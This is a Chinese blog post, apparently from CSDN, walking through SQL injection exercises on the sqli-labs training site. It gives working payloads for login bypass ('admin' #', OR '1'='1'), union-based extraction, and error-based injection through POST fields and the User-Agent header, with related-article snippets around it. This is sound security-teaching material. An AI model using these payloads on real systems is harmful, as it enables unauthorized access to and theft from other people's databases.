SQL注入(其他)

最新推荐文章于 2023-05-26 23:44:45 发布
最新推荐文章于 2023-05-26 23:44:45 发布
阅读量205 收藏
点赞数 1
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43997530/article/details/105842285
版权

(1)sql注入之万能密码(sqli-labs-master/Less-11)

这是一个使用用户名和密码登录的页面,当输入正确时效果如下,它会回显你的用户名和密码

这是执行操作的SQL语句: 

SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

我们可以看到这是POST型,使用burp suite代理;

注释法

用户名处 :admin‘ #                       //这样就会注释掉后面的语句,也就不需要输入密码

添加【or】

admin’ or ‘1’=‘1                   //or的用法是有一个条件为真,即为真,语句便会执行,这样我们也不需要输入密码

 

传统注入

uname=0' union all select database(),2 --+&passwd=0&submit=Submit            //联合查询注入

(2)update型(sqli-labs-master/Less-17)

重置密码:这是一个重置密码的网页,我们可以判断它的SQL语句为updata;当我们输入信息后,只会提示正确,而没有其他回显位。如下:

虽然没用回显位,但是可以抛出异常,初步判断可以使用报错型注入。

uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database()))--+&submit=Submit

(3) insert型

UA字段:这里当我们登录后页面会显示一个UA字段的信息,我们可以修改UA的信息来进行注入,

通过判断,它的闭合方式为单引号' '闭合,我们在其前面和后面分别构造语句形成闭合,然后在中间利用and插入我们想要的SQL语句。

User-Agent:1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database())) and 1='1 

 

嚴 帅
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入攻击流量情况
07-18
sql注入攻击流量情况
大白话mysql之深入浅出索引原理 - 下
zsgg123的博客
04-14 1128
大白话mysql之深入浅出索引原理 - 下索引覆盖最左前缀原则前缀索引合适的前缀索引长度前缀索引的缺点索引下推写在最后 索引覆盖 在之前《大白话mysql之深入浅出索引原理 - 下》这篇文章中提到过,mysql 的 innodb 引擎通过搜索树方式实现索引,索引类型分为主键索引和二级索引(非主键索引),主键索引树中,叶子结点保存着主键即对应行的全部数据;而二级索引树中,叶子结点保存着索引值和主键值,当使用二级索引进行查询时,需要进行回表操作。假如我们现在有如下表结构。 CREATE TABLE `user_
学一点SQL注入基础
qq_42404383的博客
08-25 246
文章目录学一点SQL注入基础思维导图注入原理MySQL三种注释MySQL三种注入方式联合查询注入确定字段数常规步骤sqlmap的使用跨库注入MySQL注入获取最高权限-文件操作利用cookie注入HTTP头注入MySQL加解密注入及宽字节注入MySQL报错注入insert、update、delete注入PHP操作数据库SQL盲注(bool和sleep)bool型注入延时注入(sleep)SQL二次注入SQL绕过注入 学一点SQL注入基础 思维导图 注入原理 例如:python #引入 import
sqli-labs通关全解---insert,delete,update,order by--less17,less46~less53--6
cyynid的博客
01-11 175
在实际的过程中,不只有select函数可能会造成sql注入漏洞,其他的sql函数同样会造成问题,本文对此进行列举。
SpringBoot之Shiro学习三
weixin_43288858的博客
11-24 223
快速上手之Shiro内置JdbcRealm实操 简介:讲解Shiro内置 JdbcRealm实操 shiro通过数据库查询权限 使用jdbcrealm.ini #注意 文件格式必须为ini,编码为ANSI #声明Realm,指定realm类型 jdbcRealm=org.apache.shiro.realm.jdbc.JdbcRealm #配置数据源 #dataSource=com.mchange...
SQL注入 (中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 5万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
20202402 2021-2022-2 《网络与系统攻防技术》实验八实验报告
weixin_51387301的博客
05-26 150
1、Web前端HTML能正常安装、启停Apache。理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML。2、Web前端javascipt理解JavaScript的基本功能,理解DOM。在1.的基础上,编写JavaScript验证用户名、密码的规则。在用户点击登陆按钮后回显“欢迎+输入的用户名”。尝试注入攻击:利用回显用户名注入HTML及JavaScript。3、Web后端:MySQL基础:正常安装、启动MySQL,建库、创建用户、修改密码、建表。
SQL 拼接语句输出_sql注入问题(mysql) - Sg、
weixin_39876856的博客
11-16 379
1、为什么会出现这种问题?  利用特殊符号和注释语法来绕过sql校验  演示:通过用户输入的用户名和密码来使用数据库校验import pymysql # 与MySQL数据库建立连接 conn = ( host="", port=3306, user="root", passwd="123", db="data", charset=...
字符串拼接存在的SQL注入隐患
Hi~ o(* ̄▽ ̄*)ブ
05-21 1851
前面博文写到用pymysql连接MySQL数据库: #!/usr/bin/env python # -*- coding:utf-8 -*- import pymysql # 创建连接 conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123', db='t1') ...
MySQL查询优化:LIMIT 1避免全表扫描
移动编程
03-27 1114
在某些情况下,如果明知道查询结果只有一个,SQL语句中使用LIMIT 1会提高查询效率。 例如下面的用户表(主键id,邮箱,密码): create table t_user( id int primary key auto_increment, email varchar(255), password varchar(255) ); 每个用户的email是唯一的,如果用户使用em...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL 注入学习天书
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
CTFshow-WEB入门-SQL注入(中)
feng的博客
02-08 1811
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
SQL注入
Shuaishenaaaa的博客
09-29 253
1.mysql通过sql注入登录 select *from user where username = ''or 1=1 limit 1#' and password = 'zhangsan' select *from user where username = ''or 1=1 limit 1 -- ' and password = 'zhangsan' mysql中#为注释符号 ora...
SQL注入——POST注入和HEAD注入
weixin_46601374的博客
02-25 1631
POST注入如何注入 POST注入和普通注入一样,只是通过post提交数据,在提交的数据中进行注入。 post注入会出现在哪里 登录框,查询框等各种各样的框 万能密码原理 select username,password from users where username='admin' and password = ' 'or 1=1%23' limit 0,1(我们来看着语句逻辑,where后面是条件,usernamepassword之间是and连接,所以两个有一个为否返回就是否,
SQL注入1(联合注入)
嚴 帅的博客
04-20 5275
数据库基础: 一、数据库的操作 (1)基本语句: mysql -u xxx //进入mysql show databases; //查看所有库名 use XXX; //进入某个库 show tables;//查看库的表 查询语句:select 数据操作语句:insert(插入)、updata(修改)、delete(删除) (2)SQL注入的常用语句。 Order by语句 ...
XSS跨站脚本漏洞(绕过篇)
嚴 帅的博客
05-07 1656
前面我们提到XSS,对于一个基本的XSS漏洞页面,它发生的原因往往是从用户输入的数据到输出没有有效的过滤,就比如下面的这个范例代码。 <?php $a = $_GET['a']; echo $a; ?> 对于这样毫无过滤的页面,我们可以使用一些简单的恶意脚本即可完成攻击,但是事实上,为了应付XSS的攻击,我们会采用黑名单技术对一些特殊字符进行过滤,包括一些敏感的函数。但是这样一来...
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了防止SQL注入攻击,开发人员应该采取以下措施: 1. 使用参数化查询或预编译语句:这样可以将用户输入的数据作为参数传递给SQL查询,而不是将其直接拼接到查询语句中。这样可以防止恶意代码的注入。 2. 输入验证和过滤:对用户输入进行验证和过滤,确保只接受符合预期格式的数据。例如,可以使用正则表达式验证输入是否符合特定的模式。 3. 最小权限原则:确保数据库用户只具有执行必要操作的最低权限。这样即使发生SQL注入攻击,攻击者也无法执行敏感操作。 4. 错误处理:不要向用户显示详细的错误信息,以防止攻击者获取有关数据库结构和配置的敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值